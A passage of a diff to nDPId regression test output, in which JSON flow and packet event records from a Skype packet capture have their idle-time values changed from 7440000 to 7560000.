-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3dtAAEAG4QXAqAEib91KL8OHnF60mgT1AAAAALAC\/\/9fYAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAbK1AAEAGNnfAqAEinTc4ksOFnF5LaK4QAAAAALAC\/\/8DvAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50054,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVldAAEAGAsbAqAEinTeCmcOGnEV7WkqhAAAAALAC\/\/\/tSQAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50055,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3dtAAEAG4QXAqAEib91KL8OHnF60mgT1AAAAALAC\/\/9fYAAAAgQFtAEDAwUBAQgKPiMELQAAAAAEAgAA"} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0XMQAAEARBHrAqAEiQAQXrTLdnFEAIKzLnEACNoZuauEq3ADhWmqb7oTzdlIdyJ9N"} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":844,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -469,32 +469,32 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1431969673443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969673443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA180cAAEARCDTAqAEib91NlTLdnF4AIdImnEQCEhW3FidGQ7GJtk\/GLqF7d8vgcOXTwQ=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"skype.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969673443,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1431969673574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673574,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIpxFw4bvEzbne1pKoqASOJB0cwAAAgQFrAQCCApOtNyOPiMELQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1431969673574,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673574,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MLVAAEAGKHTAqAEinTeCmcOGnEV7Wkqi7xM26IAQECzLGgAAAQEICj4jBLBOtNyO"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1431969673591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673591,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIpxew4VPS3COS2iuEaASOJBdoQAAAgQFrAQCCApNhXEjPiMELQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1431969673591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673591,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06I5AAEAGuqHAqAEinTc4ksOFnF5LaK4RT0twj4AQECy0NwAAAQEICj4jBMFNhXEj"} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1431969673741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673741,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOVv3UovwKgBIpxew4ef2YLStJoE9qASOJBoyQAAAgQFrAQCCApNhV7NPiMELQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1431969673741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673741,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gCZAAEAGPsfAqAEib91KL8OHnF60mgT2n9mC04AQECy+ygAAAQEICj4jBVZNhV7N"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1431969673574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673574,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIpxFw4bvEzbne1pKoqASOJB0cwAAAgQFrAQCCApOtNyOPiMELQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"skype.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1431969673574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673574,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MLVAAEAGKHTAqAEinTeCmcOGnEV7Wkqi7xM26IAQECzLGgAAAQEICj4jBLBOtNyO"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1431969673591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673591,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIpxew4VPS3COS2iuEaASOJBdoQAAAgQFrAQCCApNhXEjPiMELQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1431969673591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673591,"pkt":"0NQSxnP1PBXCt3IOCABFAAA06I5AAEAGuqHAqAEinTc4ksOFnF5LaK4RT0twj4AQECy0NwAAAQEICj4jBMFNhXEj"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1431969673741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969673741,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOVv3UovwKgBIpxew4ef2YLStJoE9qASOJBoyQAAAgQFrAQCCApNhV7NPiMELQEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"skype.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1431969673741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969673741,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0gCZAAEAGPsfAqAEib91KL8OHnF60mgT2n9mC04AQECy+ygAAAQEICj4jBVZNhV7N"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAABBxa4AAEAR02nAqAEinTeCkjLdnFoALfPInEYCTMX9D0zWqHZlar9rRJ4nLA7eV\/fFhp0UOFHwVjJRpWMfLA=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1431969674456,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969674456,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9FOcAAEARGqjAqAEi1cezjzLdnFYAKftynEgChXSqdM1qvdY\/tcyUx+hTJaaUvSW+LNUHctwmtBhJ"} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":874,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969674456,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAteJAAEAG7UHAqAEinTc4ksOIAbsXgt4IAAAAALAC\/\/+cAgAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.153","src_port":50057,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQxNAAEAGFgrAqAEinTeCmcOJAbvJCUUsAAAAALAC\/\/85TwAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675056,"flow_last_seen":1431969675056,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675056,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.47","src_port":50058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1431969675056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675056,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWxNAAEAGY87AqAEib91KL8OKAbuRyk0GAAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1431969675186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675186,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiGdN4KZwKgBIgG7w4mX7uJ3yQlFLaASOJBqegAAAgQFrAQCCApOtN4hPiMKdQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"skype.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1431969675186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675186,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04itAAEAGdv3AqAEinTeCmcOJAbvJCUUtl+7ieIAQECzBIgAAAQEICj4jCvdOtN4h"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1431969675201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675201,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsCidNziSwKgBIgG7w4gH6KF9F4LeCaASOJAKyQAAAgQFrAQCCApNhXK2PiMKdQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1431969675201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675201,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0v5VAAEAG45rAqAEinTc4ksOIAbsXgt4JB+ihfoAQECxhYwAAAQEICj4jCwVNhXK2"} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1431969675353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969675353,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOVv3UovwKgBIgG7w4qMyvZEkcpNB6ASOJB16gAAAgQFrAQCCApNhWBgPiMKdQEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"skype.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1431969675353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969675353,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0A+1AAEAGuwDAqAEib91KL8OKAbuRyk0HjMr2RYAQECzL7gAAAQEICj4jC5tNhWBg"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675413,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.38","src_port":50059,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"skype.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431969675413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675413,"pkt":"0NQSxnP1PBXCt3IOCABFAABAarpAAEAGVDDAqAEib91KJsOLnE+UB73TAAAAALAC\/\/+\/fwAAAgQFtAEDAwUBAQgKPiML1gAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969675055,"flow_last_seen":1431969675055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969675055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50056,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431969675055,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969675055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAteJAAEAG7UHAqAEinTc4ksOIAbsXgt4IAAAAALAC\/\/+cAgAAAgQFtAEDAwUBAQgKPiMKdQAAAAAEAgAA"} 
